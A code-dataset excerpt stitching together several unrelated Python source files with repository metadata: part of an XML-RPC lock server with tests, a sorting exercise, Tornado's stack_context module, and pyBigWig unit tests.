end = datetime.now() + timedelta(seconds = 10000)
self.data[key.data] = (pickle.dumps(file), end)
print " ", key, "aft r_lock", file['r_lock']
print " ", key, "aft w_lock", file['w_lock']
print user, " leave acquire_W_lock"
return Binary(pickle.dumps(w))
"""
release read lock
"""
def release_r_lock(self, key, u_id):
file = copy.deepcopy(pickle.loads(self.data[key.data][0]))
user = pickle.loads(u_id.data)
print user, "enter release_R_lock"
print " ", key, "pre r_lock", file['r_lock']
print " ", key, "pre w_lock", file['w_lock']
file['r_lock'] -= 1
self.check()
end = datetime.now() + timedelta(seconds = 10000)
self.data[key.data] = (pickle.dumps(file), end)
print " ", key, "aft r_lock", file['r_lock']
print " ", key, "aft w_lock", file['w_lock']
print user, " leave release_R_lock"
return True
"""
release write lock and write back data
"""
def release_w_lock(self, key, u_id, ctx):
self.check()
end = datetime.now() + timedelta(seconds = 10000)
self.data[key.data] = (ctx.data, end)
file = copy.deepcopy(pickle.loads(self.data[key.data][0]))
user = pickle.loads(u_id.data)
print user, "enter release_W_lock"
print " ", key, "pre r_lock", file['r_lock']
print " ", key, "pre w_lock", file['w_lock']
file['w_lock'] = 0
self.check()
end = datetime.now() + timedelta(seconds = 10000)
self.data[key.data] = (pickle.dumps(file), end)
print " ", key, "aft r_lock", file['r_lock']
print " ", key, "aft w_lock", file['w_lock']
print user, " leave release_R_lock"
return True
"""
acquire delete lock
"""
def acquire_d_lock(self, key, u_id):
file = copy.deepcopy(pickle.loads(self.data[key.data][0]))
user = pickle.loads(u_id.data)
print user, " enter acquire_D_lock"
print " ", key, "pre r_lock", file['r_lock']
print " ", key, "pre w_lock", file['w_lock']
d = file['r_lock'] + file['w_lock']
print " ", key, "aft r_lock", file['r_lock']
print " ", key, "aft w_lock", file['w_lock']
print user, " leave acquire_D_lock"
return Binary(pickle.dumps(d))
# Load contents from a file
def read_file(self, filename):
f = open(filename.data, "rb")
self.data = pickle.load(f)
f.close()
return True
# Write contents to a file
def write_file(self, filename):
f = open(filename.data, "wb")
pickle.dump(self.data, f)
f.close()
return True
# Print the contents of the hashtable
def print_content(self):
print self.data
return True
# Remove expired entries
def check(self):
now = datetime.now()
if self.next_check > now:
return
self.next_check = datetime.now() + timedelta(minutes = 5)
to_remove = []
for key, value in self.data.items():
if value[1] < now:
to_remove.append(key)
for key in to_remove:
del self.data[key]
"""
used to test the atomicity of server
"""
def test_atomicity(self, key):
print "The client ", key.data , "enter"
time.sleep(5)
print "The client ", key.data , "leave"
return True
def main():
optlist, args = getopt.getopt(sys.argv[1:], "", ["port=", "test"])
ol={}
for k,v in optlist:
ol[k] = v
port = 9000
if "--port" in ol:
port = int(ol["--port"])
if "--test" in ol:
sys.argv.remove("--test")
unittest.main()
return
serve(port)
# Start the xmlrpc server
def serve(port):
file_server = SimpleXMLRPCServer.SimpleXMLRPCServer(('', port))
file_server.register_introspection_functions()
sht = SimpleHT()
file_server.register_function(sht.get)
file_server.register_function(sht.put)
file_server.register_function(sht.acquire_d_lock)
file_server.register_function(sht.acquire_r_lock)
file_server.register_function(sht.acquire_w_lock)
file_server.register_function(sht.release_r_lock)
file_server.register_function(sht.release_w_lock)
file_server.register_function(sht.test_atomicity)
file_server.register_function(sht.print_content)
file_server.register_function(sht.read_file)
file_server.register_function(sht.write_file)
file_server.serve_forever()
# Execute the xmlrpc in a thread ... needed for testing
class serve_thread:
def __call__(self, port):
serve(port)
# Wrapper functions so the tests don't need to be concerned about Binary blobs
class Helper:
def __init__(self, caller):
self.caller = caller
def put(self, key, val, ttl):
return self.caller.put(Binary(key), Binary(val), ttl)
def get(self, key):
return self.caller.get(Binary(key))
def write_file(self, filename):
return self.caller.write_file(Binary(filename))
def read_file(self, filename):
return self.caller.read_file(Binary(filename))
def acquire_r_lock(self, key, u_id):
return self.caller.acquire_r_lock(Binary(key), Binary(u_id))
def acquire_w_lock(self, key, u_id):
return self.caller.acquire_w_lock(Binary(key), Binary(u_id))
def acquire_d_lock(self, key, u_id):
return self.caller.acquire_d_lock(Binary(key), Binary(u_id))
def release_r_lock(self, key, u_id):
return self.caller.release_r_lock(Binary(key), Binary(u_id))
def release_w_lock(self, key, u_id):
return self.caller.release_w_lock(Binary(key), Binary(u_id))
class SimpleHTTest(unittest.TestCase):
def test_direct(self):
helper = Helper(SimpleHT())
self.assertEqual(helper.get("test"), {}, "DHT isn't empty")
self.assertTrue(helper.put("test", "test", 10000), "Failed to put")
self.assertEqual(helper.get("test")["value"], "test", "Failed to perform single get")
self.assertTrue(helper.put("test", "test0", 10000), "Failed to put")
self.assertEqual(helper.get("test")["value"], "test0", "Failed to perform overwrite")
self.assertTrue(helper.put("test", "test1", 2), "Failed to put" )
self.assertEqual(helper.get("test")["value"], "test1", "Failed to perform overwrite")
time.sleep(2)
self.assertEqual(helper.get("test"), {}, "Failed expire")
self.assertTrue(helper.put("test", "test2", 20000))
self.assertEqual(helper.get("test")["value"], "test2", "Store new value")
helper.write_file("test")
helper = Helper(SimpleHT())
self.assertEqual(helper.get("test"), {}, "DHT isn't empty")
helper.read_file("test")
self.assertEqual(helper.get("test")["value"], "test2", "Load unsuccessful!")
self.assertTrue(helper.put("some_other_key", "some_value", 10000))
self.assertEqual(helper.get("some_other_key")["value"], "some_value", "Different keys")
self.assertEqual(helper.get("test")["value"], "test2", "Verify contents")
# Test via RPC
def test_xmlrpc(self):
output_thread = threading.Thread(target=serve_thread(), args=(9000, ))
output_thread.setDaemon(True)
output_thread.start()
time.sleep(1)
helper = Helper(xmlrpclib.Server("http://127.0.0.1:9000"))
self.assertEqual(helper.get("test"), {}, "DHT isn't empty")
self.assertTrue(helper.put("test", "test", 10000), "Failed to put")
self.assertEqual(helper.get("test")["value"], "test", "Failed to perform single get")
self.assertTrue(helper.put("test", "test0", 10000), "Failed to put")
self.assertEqual(helper.get("test")["value"], "test0", "Failed to perform overwrite")
self.assertTrue(helper.put("test", "test1", 2), "Failed to put" )
self.assertEqual(helper.get("test")["value"], "test1", "Failed to perform overwrite")
time.sleep(2)
self.assertEqual(helper.get("test"), {}, "Failed expire")
self.assertTrue(helper.put("test", "test2", 20000))
self.assertEqual(helper.get("test")["value"], "test2", "Store new value")
if __name__ == "__main__":
main()
| gpl-2.0 | 4,591,019,497,275,567,600 | 32.675758 | 91 | 0.635112 | false |
meisamhe/GPLshared | Programming/MPI — AMath 483 583, Spring 2013 1.0 documentation_files/sort_k_increasing_decreasing_array.py | 1 | 2421 | import sys
import random
import itertools
from merge_sorted_arrays import merge_sorted_arrays
# @include
def sort_k_increasing_decreasing_array(A):
# Decomposes A into a set of sorted arrays.
sorted_subarrays = []
INCREASING, DECREASING = range(2)
subarray_type = INCREASING
start_idx = 0
for i in range(1, len(A) + 1):
if (i == len(A) or # A is ended. Adds the last subarray.
(A[i - 1] < A[i] and subarray_type == DECREASING) or
(A[i - 1] >= A[i] and subarray_type == INCREASING)):
sorted_subarrays.append(A[start_idx:i] if subarray_type ==
INCREASING else A[i - 1:start_idx - 1:-1])
start_idx = i
subarray_type = (DECREASING
if subarray_type == INCREASING else INCREASING)
return merge_sorted_arrays(sorted_subarrays)
# Pythonic solution, uses a stateful object to trace the monotonic subarrays.
def sort_k_increasing_decreasing_array_pythonic(A):
class Monotonic:
def __init__(self):
self._last = float('-inf')
def __call__(self, curr):
res = curr < self._last
self._last = curr
return res
return merge_sorted_arrays([
list(group)[::-1 if is_decreasing else 1]
for is_decreasing, group in itertools.groupby(A, Monotonic())
])
# @exclude
def simple_test():
A = [1, 2, 3, 2, 1, 4, 5, 10, 9, 4, 4, 1, -1]
assert sorted(A) == sort_k_increasing_decreasing_array(
A) == sort_k_increasing_decreasing_array_pythonic(A)
A = [-2**64, -1, 0, 1, 2, 4, 8, 2**64 - 1]
assert sorted(A) == sort_k_increasing_decreasing_array(
A) == sort_k_increasing_decreasing_array_pythonic(A)
A = list(reversed(A))
assert sorted(A) == sort_k_increasing_decreasing_array(
A) == sort_k_increasing_decreasing_array_pythonic(A)
def main():
simple_test()
for _ in range(1000):
n = int(sys.argv[1]) if len(sys.argv) == 2 else random.randint(1, 10000)
print('n =', n)
A = [random.randint(-999999, 999999) for _ in range(n)]
ans = sort_k_increasing_decreasing_array(A)
# print(*A)
# print(*ans)
assert len(ans) == len(A)
assert ans == sorted(ans)
assert ans == sort_k_increasing_decreasing_array_pythonic(A)
if __name__ == '__main__':
main()
| gpl-3.0 | -7,189,984,414,671,217,000 | 32.164384 | 80 | 0.576621 | false |
jackylee0424/Physioboard | sc-phonegap-tornado-websocket/Server/tornado/stack_context.py | 1 | 8142 | #!/usr/bin/env python
#
# Copyright 2010 Facebook
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
'''StackContext allows applications to maintain threadlocal-like state
that follows execution as it moves to other execution contexts.
The motivating examples are to eliminate the need for explicit
async_callback wrappers (as in tornado.web.RequestHandler), and to
allow some additional context to be kept for logging.
This is slightly magic, but it's an extension of the idea that an exception
handler is a kind of stack-local state and when that stack is suspended
and resumed in a new context that state needs to be preserved. StackContext
shifts the burden of restoring that state from each call site (e.g.
wrapping each AsyncHTTPClient callback in async_callback) to the mechanisms
that transfer control from one context to another (e.g. AsyncHTTPClient
itself, IOLoop, thread pools, etc).
Example usage::
@contextlib.contextmanager
def die_on_error():
try:
yield
except Exception:
logging.error("exception in asynchronous operation",exc_info=True)
sys.exit(1)
with StackContext(die_on_error):
# Any exception thrown here *or in callback and its desendents*
# will cause the process to exit instead of spinning endlessly
# in the ioloop.
http_client.fetch(url, callback)
ioloop.start()
'''
from __future__ import with_statement
import contextlib
import functools
import itertools
import sys
import threading
class _State(threading.local):
def __init__(self):
self.contexts = ()
_state = _State()
class StackContext(object):
'''Establishes the given context as a StackContext that will be transferred.
Note that the parameter is a callable that returns a context
manager, not the context itself. That is, where for a
non-transferable context manager you would say::
with my_context():
StackContext takes the function itself rather than its result::
with StackContext(my_context):
'''
def __init__(self, context_factory):
self.context_factory = context_factory
# Note that some of this code is duplicated in ExceptionStackContext
# below. ExceptionStackContext is more common and doesn't need
# the full generality of this class.
def __enter__(self):
self.old_contexts = _state.contexts
# _state.contexts is a tuple of (class, arg) pairs
_state.contexts = (self.old_contexts +
((StackContext, self.context_factory),))
try:
self.context = self.context_factory()
self.context.__enter__()
except Exception:
_state.contexts = self.old_contexts
raise
def __exit__(self, type, value, traceback):
try:
return self.context.__exit__(type, value, traceback)
finally:
_state.contexts = self.old_contexts
class ExceptionStackContext(object):
'''Specialization of StackContext for exception handling.
The supplied exception_handler function will be called in the
event of an uncaught exception in this context. The semantics are
similar to a try/finally clause, and intended use cases are to log
an error, close a socket, or similar cleanup actions. The
exc_info triple (type, value, traceback) will be passed to the
exception_handler function.
If the exception handler returns true, the exception will be
consumed and will not be propagated to other exception handlers.
'''
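    # Hedged usage sketch (added for illustration, not from the original source):
    # log and consume any exception raised inside the context.
    #
    #   def handle_exc(typ, value, tb):
    #       logging.error("uncaught exception", exc_info=(typ, value, tb))
    #       return True  # returning True consumes the exception
    #
    #   with ExceptionStackContext(handle_exc):
    #       http_client.fetch(url, callback)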
def __init__(self, exception_handler):
self.exception_handler = exception_handler
def __enter__(self):
self.old_contexts = _state.contexts
_state.contexts = (self.old_contexts +
((ExceptionStackContext, self.exception_handler),))
def __exit__(self, type, value, traceback):
try:
if type is not None:
return self.exception_handler(type, value, traceback)
finally:
_state.contexts = self.old_contexts
class NullContext(object):
'''Resets the StackContext.
Useful when creating a shared resource on demand (e.g. an AsyncHTTPClient)
    where the stack that caused the creation is not relevant to future
operations.
'''
def __enter__(self):
self.old_contexts = _state.contexts
_state.contexts = ()
def __exit__(self, type, value, traceback):
_state.contexts = self.old_contexts
class _StackContextWrapper(functools.partial):
pass
def wrap(fn):
    '''Returns a callable object that will restore the current StackContext
when executed.
Use this whenever saving a callback to be executed later in a
different execution context (either in a different thread or
asynchronously in the same thread).
'''
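    # Illustrative sketch (an assumption, not part of the original file): a
    # callback wrapped while a StackContext is active re-establishes that
    # context whenever it is finally invoked, even from a bare IOLoop callback.
    #
    #   with StackContext(die_on_error):
    #       cb = wrap(callback)
    #   ...
    #   cb()   # runs with die_on_error active again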
if fn is None or fn.__class__ is _StackContextWrapper:
return fn
# functools.wraps doesn't appear to work on functools.partial objects
#@functools.wraps(fn)
def wrapped(callback, contexts, *args, **kwargs):
if contexts is _state.contexts or not contexts:
callback(*args, **kwargs)
return
if not _state.contexts:
new_contexts = [cls(arg) for (cls, arg) in contexts]
# If we're moving down the stack, _state.contexts is a prefix
# of contexts. For each element of contexts not in that prefix,
# create a new StackContext object.
# If we're moving up the stack (or to an entirely different stack),
# _state.contexts will have elements not in contexts. Use
# NullContext to clear the state and then recreate from contexts.
elif (len(_state.contexts) > len(contexts) or
any(a[1] is not b[1]
for a, b in itertools.izip(_state.contexts, contexts))):
# contexts have been removed or changed, so start over
new_contexts = ([NullContext()] +
[cls(arg) for (cls,arg) in contexts])
else:
new_contexts = [cls(arg)
for (cls, arg) in contexts[len(_state.contexts):]]
if len(new_contexts) > 1:
with _nested(*new_contexts):
callback(*args, **kwargs)
elif new_contexts:
with new_contexts[0]:
callback(*args, **kwargs)
else:
callback(*args, **kwargs)
return _StackContextWrapper(wrapped, fn, _state.contexts)
@contextlib.contextmanager
def _nested(*managers):
"""Support multiple context managers in a single with-statement.
Copied from the python 2.6 standard library. It's no longer present
in python 3 because the with statement natively supports multiple
context managers, but that doesn't help if the list of context
managers is not known until runtime.
"""
exits = []
vars = []
exc = (None, None, None)
try:
for mgr in managers:
exit = mgr.__exit__
enter = mgr.__enter__
vars.append(enter())
exits.append(exit)
yield vars
except:
exc = sys.exc_info()
finally:
while exits:
exit = exits.pop()
try:
if exit(*exc):
exc = (None, None, None)
except:
exc = sys.exc_info()
if exc != (None, None, None):
# Don't rely on sys.exc_info() still containing
# the right information. Another exception may
# have been raised and caught by an exit method
raise exc[0], exc[1], exc[2]
| mit | 6,455,677,149,505,853,000 | 35.675676 | 80 | 0.646893 | false |
simmol/battletech-character-creator | load_data.py | 1 | 1267 | import yaml
# Get base stats and values
def get_base_attributes():
with open( 'data/base_stats.yaml', 'r' ) as ff:
attributes = yaml.load( ff )
return attributes
# Get Affiliations data
def get_affiliations():
with open( 'data/affiliations.yaml', 'r' ) as f:
affiliations_data = yaml.load( f )
return affiliations_data
# Get Early Childhood
def get_early_childhoods():
with open( 'data/early_childhood.yaml', 'r' ) as f:
early_childhoods = yaml.load( f )
return early_childhoods
# Get Late Childhood data
def get_late_childhoods():
with open( 'data/late_childhood.yaml', 'r' ) as f:
late_childhoods = yaml.load( f )
return late_childhoods
# Get Higher Education
def get_higher_education():
with open( 'data/higher_education.yaml', 'r' ) as f:
higher_educations = yaml.load( f )
return higher_educations
# Get Master Fields list
def get_master_fields_list():
with open( 'data/master_fields_list.yaml', 'r' ) as f:
master_fields_list = yaml.load( f )
return master_fields_list
# Get Real life modules
def get_real_life_modules():
with open( 'data/real_life.yaml', 'r' ) as f:
real_life_modules = yaml.load( f )
return real_life_modules
| gpl-2.0 | -817,951,340,370,376,100 | 21.22807 | 58 | 0.649566 | false |
briankinney/project-euler | euler502/models/test/square_solver.py | 1 | 1077 | #! /usr/bin/env python
from euler502.models.square_solver import SquareCastleSolver
from euler502.models.castle import SlowSolver
from eulercommon.constants import bigprime
import unittest
class TestSquareSolver(unittest.TestCase):
def test_F(self):
def test_helper(width, height):
sq = SquareCastleSolver(height, 31)
ss = SlowSolver(width, height, 31)
self.assertEqual(sq.F(width), ss.F(width))
test_helper(4, 2)
for i in range(10):
test_helper(i + 1, 40)
for i in range(10):
test_helper(40, i + 2)
def test_supplied_answers(self):
def test_pair(width, height, solution):
print "Testing F({width},{height}) = {solution}".format(**locals())
sqs = SquareCastleSolver(height, 11)
self.assertEquals(sqs.F(width), solution)
test_pair(4, 2, 10)
test_pair(13, 10, 3729050610636 % 11)
test_pair(10, 13, 37959702514 % 11)
#test_pair(100, 100, 841913936)
if __name__ == '__main__':
unittest.main()
| mit | 5,340,415,658,812,210,000 | 29.771429 | 79 | 0.608171 | false |
ningmo/pynote | MySqlHelper.py | 1 | 1150 | #-*- coding:utf-8 -*-
import MySQLdb
class MySqlHelper:
@staticmethod
def FetchSql(host, user, password, database, sql, port=3306):
try:
            conn = MySQLdb.connect (host=host,
                                    port=port,
user=user,
passwd=password,
db=database,
charset="utf8")
cursor = conn.cursor ()
cursor.execute (sql)
rows = cursor.fetchall ()
cursor.close ()
conn.close ()
return rows
except Exception,what:
print "Error in ExecuteSql:%s" % sql
raise what
@staticmethod
def ExecuteSql(host, user, password, database, sql, port=3306):
try:
            conn = MySQLdb.connect (host=host, port=port, user=user, passwd=password, db=database, charset="utf8")
cursor = conn.cursor ()
rows = cursor.execute (sql)
cursor.close ()
conn.close ()
return rows
except Exception,what:
print "Error in ExecuteSql:%s" % sql
raise what | agpl-3.0 | -5,288,608,114,324,368,000 | 33.878788 | 103 | 0.482609 | false |
kei10in/dotfav | features/steps/symlink_step.py | 1 | 1342 | # -*- coding: utf-8 -*-
from hamcrest import *
from utils import *
@given('dotfiles home directory contains a file named "{filename}"')
def step_impl(context, filename):
(dotfiles_home / filename).touch()
@given('dotfiles home directory contains a directory named "{dirname}"')
def step_impl(context, dirname):
(dotfiles_home / dirname).mkdir()
@given('dotfiles contains config file')
def step_impl(context):
create_config_file(context.text)
@then('no files are symlinked')
def step_impl(context):
symlink_path = [p.resolve() for p in home.iterdir() if p.is_symlink()]
dotfiles = dotfiles_home.rglob('*')
assert_that(symlink_path,
any_of(is_(empty()), is_not(contains(is_in(dotfiles)))))
@then('"{name}" in home symlinks to "{target}" in dotfiles home')
def step_impl(context, name, target):
path = home / name
target_path = dotfiles_home / target
assert_that(path.is_symlink(), 'path must be symlink file')
assert_that(path.resolve(), equal_to(target_path))
@then('"{filename}" in home is file')
def step_impl(context, filename):
path = home / filename
assert_that(path.is_file(), 'path must be file')
@then('"{dirname}" in home is directory')
def step_impl(context, dirname):
path = home / dirname
assert_that(path.is_dir(), 'path must be directory')
| mit | -7,677,806,799,897,577,000 | 26.387755 | 74 | 0.669896 | false |
deeptools/pyBigWig | pyBigWigTest/test.py | 1 | 13205 | import pyBigWig
import tempfile
import os
import sys
import hashlib
import numpy as np
class TestRemote():
fname = "http://raw.githubusercontent.com/dpryan79/pyBigWig/master/pyBigWigTest/test.bw"
def doOpen(self):
bw = pyBigWig.open(self.fname)
assert(bw is not None)
return bw
def doOpenWith(self):
with pyBigWig.open(self.fname) as bw:
assert(bw.chroms() == {'1': 195471971, '10': 130694993})
def doChroms(self, bw):
assert(bw.chroms() == {'1': 195471971, '10': 130694993})
assert(bw.chroms("1") == 195471971)
assert(bw.chroms("c") is None)
def doHeader(self, bw):
assert(bw.header() == {'maxVal': 2, 'sumData': 272, 'minVal': 0, 'version': 4, 'sumSquared': 500, 'nLevels': 1, 'nBasesCovered': 154})
def doStats(self, bw):
assert(bw.stats("1", 0, 3) == [0.2000000054637591])
assert(bw.stats("1", 0, 3, type="max") == [0.30000001192092896])
assert(bw.stats("1",99,200, type="max", nBins=2) == [1.399999976158142, 1.5])
assert(bw.stats("1",np.int64(99), np.int64(200), type="max", nBins=2) == [1.399999976158142, 1.5])
assert(bw.stats("1") == [1.3351851569281683])
def doValues(self, bw):
assert(bw.values("1", 0, 3) == [0.10000000149011612, 0.20000000298023224, 0.30000001192092896])
assert(bw.values("1", np.int64(0), np.int64(3)) == [0.10000000149011612, 0.20000000298023224, 0.30000001192092896])
#assert(bw.values("1", 0, 4) == [0.10000000149011612, 0.20000000298023224, 0.30000001192092896, 'nan'])
def doIntervals(self, bw):
assert(bw.intervals("1", 0, 3) == ((0, 1, 0.10000000149011612), (1, 2, 0.20000000298023224), (2, 3, 0.30000001192092896)))
assert(bw.intervals("1", np.int64(0), np.int64(3)) == ((0, 1, 0.10000000149011612), (1, 2, 0.20000000298023224), (2, 3, 0.30000001192092896)))
assert(bw.intervals("1") == ((0, 1, 0.10000000149011612), (1, 2, 0.20000000298023224), (2, 3, 0.30000001192092896), (100, 150, 1.399999976158142), (150, 151, 1.5)))
def doSum(self, bw):
assert(bw.stats("1", 100, 151, type="sum", nBins=2) == [35.0, 36.5])
def doWrite(self, bw):
ofile = tempfile.NamedTemporaryFile(delete=False)
oname = ofile.name
ofile.close()
bw2 = pyBigWig.open(oname, "w")
assert(bw2 is not None)
#Since this is an unordered dict(), iterating over the items can swap the order!
chroms = [("1", bw.chroms("1")), ("10", bw.chroms("10"))]
assert(len(bw.chroms()) == 2)
bw2.addHeader(chroms, maxZooms=1)
#Copy the input file
for c in chroms:
ints = bw.intervals(c[0])
chroms2 = []
starts = []
ends = []
values = []
for entry in ints:
chroms2.append(c[0])
starts.append(entry[0])
ends.append(entry[1])
values.append(entry[2])
bw2.addEntries(chroms2, starts, ends=ends, values=values)
bw2.close()
#Ensure that the copied file has the same entries and max/min/etc.
bw2 = pyBigWig.open(oname)
assert(bw.header() == bw2.header())
assert(bw.chroms() == bw2.chroms())
for c in chroms:
ints1 = bw.intervals(c[0])
ints2 = bw2.intervals(c[0])
assert(ints1 == ints2)
bw.close()
bw2.close()
#Clean up
os.remove(oname)
def doWrite2(self):
'''
Test all three modes of storing entries. Also test to ensure that we get error messages when doing something silly
This is a modified version of the writing example from libBigWig
'''
chroms = ["1"]*6
starts = [0, 100, 125, 200, 220, 230, 500, 600, 625, 700, 800, 850]
ends = [5, 120, 126, 205, 226, 231]
values = [0.0, 1.0, 200.0, -2.0, 150.0, 25.0, 0.0, 1.0, 200.0, -2.0, 150.0, 25.0, -5.0, -20.0, 25.0, -5.0, -20.0, 25.0]
ofile = tempfile.NamedTemporaryFile(delete=False)
oname = ofile.name
ofile.close()
bw = pyBigWig.open(oname, "w")
bw.addHeader([("1", 1000000), ("2", 1500000)])
#Intervals
bw.addEntries(chroms[0:3], starts[0:3], ends=ends[0:3], values=values[0:3])
bw.addEntries(chroms[3:6], starts[3:6], ends=ends[3:6], values=values[3:6])
#IntervalSpans
bw.addEntries("1", starts[6:9], values=values[6:9], span=20)
bw.addEntries("1", starts[9:12], values=values[9:12], span=20)
#IntervalSpanSteps, this should instead take an int
bw.addEntries("1", 900, values=values[12:15], span=20, step=30)
bw.addEntries("1", 990, values=values[15:18], span=20, step=30)
#Attempt to add incorrect values. These MUST raise an exception
try:
bw.addEntries(chroms[0:3], starts[0:3], ends=ends[0:3], values=values[0:3])
assert(1==0)
except RuntimeError:
pass
try:
bw.addEntries("1", starts[6:9], values=values[6:9], span=20)
assert(1==0)
except RuntimeError:
pass
try:
bw.addEntries("3", starts[6:9], values=values[6:9], span=20)
assert(1==0)
except RuntimeError:
pass
try:
bw.addEntries("1", 900, values=values[12:15], span=20, step=30)
assert(1==0)
except RuntimeError:
pass
#Add a few intervals on a new chromosome
bw.addEntries(["2"]*3, starts[0:3], ends=ends[0:3], values=values[0:3])
bw.close()
#check md5sum, this is the simplest method to check correctness
h = hashlib.md5(open(oname, "rb").read()).hexdigest()
assert(h=="ef104f198c6ce8310acc149d0377fc16")
#Clean up
os.remove(oname)
def doWriteEmpty(self):
ofile = tempfile.NamedTemporaryFile(delete=False)
oname = ofile.name
ofile.close()
bw = pyBigWig.open(oname, "w")
bw.addHeader([("1", 1000000), ("2", 1500000)])
bw.close()
#check md5sum
h = hashlib.md5(open(oname, "rb").read()).hexdigest()
assert(h=="361c600e5badf0b45d819552a7822937")
#Ensure we can open and get reasonable results
bw = pyBigWig.open(oname)
assert(bw.chroms() == {'1': 1000000, '2': 1500000})
assert(bw.intervals("1") == None)
assert(bw.values("1", 0, 1000000) == [])
assert(bw.stats("1", 0, 1000000, nBins=2) == [None, None])
bw.close()
#Clean up
os.remove(oname)
def doWriteNumpy(self):
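        # Write a bigWig from numpy arrays and verify that the intervals read
        # back match the written values (within floating point tolerance).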
ofile = tempfile.NamedTemporaryFile(delete=False)
oname = ofile.name
ofile.close()
bw = pyBigWig.open(oname, "w")
bw.addHeader([("chr1", 100), ("chr2", 150), ("chr3", 200), ("chr4", 250)])
chroms = np.array(["chr1"] * 2 + ["chr2"] * 2 + ["chr3"] * 2 + ["chr4"] * 2)
starts = np.array([0, 10, 40, 50, 60, 70, 80, 90], dtype=np.int64)
ends = np.array([5, 15, 45, 55, 65, 75, 85, 95], dtype=np.int64)
values0 = np.array(np.random.random_sample(8), dtype=np.float64)
bw.addEntries(chroms, starts, ends=ends, values=values0)
bw.close()
vals = [(x, y, z) for x, y, z in zip(starts, ends, values0)]
bw = pyBigWig.open(oname)
assert(bw.chroms() == {'chr1': 100, 'chr2': 150, 'chr3': 200, 'chr4': 250})
for idx1, chrom in enumerate(["chr1", "chr2", "chr3", "chr4"]):
for idx2, tup in enumerate(bw.intervals(chrom)):
assert(tup[0] == starts[2 * idx1 + idx2])
assert(tup[1] == ends[2 * idx1 + idx2])
assert(np.isclose(tup[2], values0[2 * idx1 + idx2]))
bw.close()
#Clean up
os.remove(oname)
def testAll(self):
bw = self.doOpen()
self.doChroms(bw)
if not self.fname.startswith("http"):
self.doHeader(bw)
self.doStats(bw)
self.doSum(bw)
self.doValues(bw)
self.doIntervals(bw)
self.doWrite(bw)
self.doOpenWith()
self.doWrite2()
self.doWriteEmpty()
self.doWriteNumpy()
bw.close()
class TestLocal():
def testFoo(self):
blah = TestRemote()
blah.fname = os.path.dirname(pyBigWig.__file__) + "/pyBigWigTest/test.bw"
blah.testAll()
class TestBigBed():
def testBigBed(self):
fname = os.path.dirname(pyBigWig.__file__) + "/pyBigWigTest/test.bigBed"
bb = pyBigWig.open(fname)
assert(bb is not None)
assert(bb.isBigWig() == 0)
assert(bb.isBigBed() == 1)
SQL = """table RnaElements
"BED6 + 3 scores for RNA Elements data "
(
string chrom; "Reference sequence chromosome or scaffold"
uint chromStart; "Start position in chromosome"
uint chromEnd; "End position in chromosome"
string name; "Name of item"
uint score; "Normalized score from 0-1000"
char[1] strand; "+ or - or . for unknown"
float level; "Expression level such as RPKM or FPKM. Set to -1 for no data."
float signif; "Statistical significance such as IDR. Set to -1 for no data."
uint score2; "Additional measurement/count e.g. number of reads. Set to 0 for no data."
)
"""
output = bb.SQL()
if isinstance(output, bytes):
output = output.decode('ASCII')
assert(output == SQL)
o = bb.entries('chr1',10000000,10020000)
expected = [(10009333, 10009640, '61035\t130\t-\t0.026\t0.42\t404'), (10014007, 10014289, '61047\t136\t-\t0.029\t0.42\t404'), (10014373, 10024307, '61048\t630\t-\t5.420\t0.00\t2672399')]
assert(o == expected)
o = bb.entries('chr1',np.int64(10000000),np.int64(10020000))
assert(o == expected)
bb.close()
class TestNumpy():
def testNumpy(self):
import os
if pyBigWig.numpy == 0:
return 0
import numpy as np
bw = pyBigWig.open("/tmp/delete.bw", "w")
bw.addHeader([("1", 1000)], maxZooms=0)
# Type 0
chroms = np.array(["1"] * 10)
starts = np.array([0, 10, 20, 30, 40, 50, 60, 70, 80, 90], dtype=np.int64)
ends = np.array([5, 15, 25, 35, 45, 55, 65, 75, 85, 95], dtype=np.int64)
values0 = np.array(np.random.random_sample(10), dtype=np.float64)
bw.addEntries(chroms, starts, ends=ends, values=values0)
starts = np.array([100, 110, 120, 130, 140, 150, 160, 170, 180, 190], dtype=np.int64)
ends = np.array([105, 115, 125, 135, 145, 155, 165, 175, 185, 195], dtype=np.int64)
values1 = np.array(np.random.random_sample(10), dtype=np.float64)
bw.addEntries(chroms, starts, ends=ends, values=values1)
# Type 1, single chrom, multiple starts/values, single span
starts = np.array([200, 210, 220, 230, 240, 250, 260, 270, 280, 290], dtype=np.int64)
values2 = np.array(np.random.random_sample(10), dtype=np.float64)
bw.addEntries(np.str("1"), starts, span=np.int(8), values=values2)
starts = np.array([300, 310, 320, 330, 340, 350, 360, 370, 380, 390], dtype=np.int64)
values3 = np.array(np.random.random_sample(10), dtype=np.float64)
bw.addEntries(np.str("1"), starts, span=np.int(8), values=values3)
# Type 2, single chrom/start/span/step, multiple values
values4 = np.array(np.random.random_sample(10), dtype=np.float64)
bw.addEntries(np.str("1"), np.int(400), span=np.int(8), step=np.int64(2), values=values4)
values5 = np.array(np.random.random_sample(10), dtype=np.float64)
bw.addEntries(np.str("1"), np.int(500), span=np.int(8), step=np.int64(2), values=values5)
bw.close()
bw = pyBigWig.open("/tmp/delete.bw")
assert(bw is not None)
def compy(start, v2):
v = []
for t in bw.intervals("1", start, start + 100):
v.append(t[2])
v = np.array(v)
assert(np.all(np.abs(v - v2) < 1e-5))
compy(0, values0)
compy(100, values1)
compy(200, values2)
compy(300, values3)
compy(400, values4)
compy(500, values5)
# Get values as a numpy array
foo = bw.values("1", 0, 100, numpy=False)
assert(isinstance(foo, list))
foo = bw.values("1", 0, 100, numpy=True)
assert(isinstance(foo, np.ndarray))
bw.close()
os.remove("/tmp/delete.bw")
def testNumpyValues(self):
if pyBigWig.numpy == 0:
return 0
import numpy as np
fname = "http://raw.githubusercontent.com/dpryan79/pyBigWig/master/pyBigWigTest/test.bw"
bw = pyBigWig.open(fname, "r")
assert np.allclose(
bw.values("1", 0, 20, numpy=True),
np.array(bw.values("1", 0, 20), dtype=np.float32),
equal_nan=True
)
assert np.allclose(
bw.stats("1", 0, 20, "mean", 5, numpy=True),
np.array(bw.stats("1", 0, 20, "mean", 5), dtype=np.float64),
equal_nan=True
)
| mit | 299,786,902,870,758,200 | 39.015152 | 194 | 0.565165 | false |
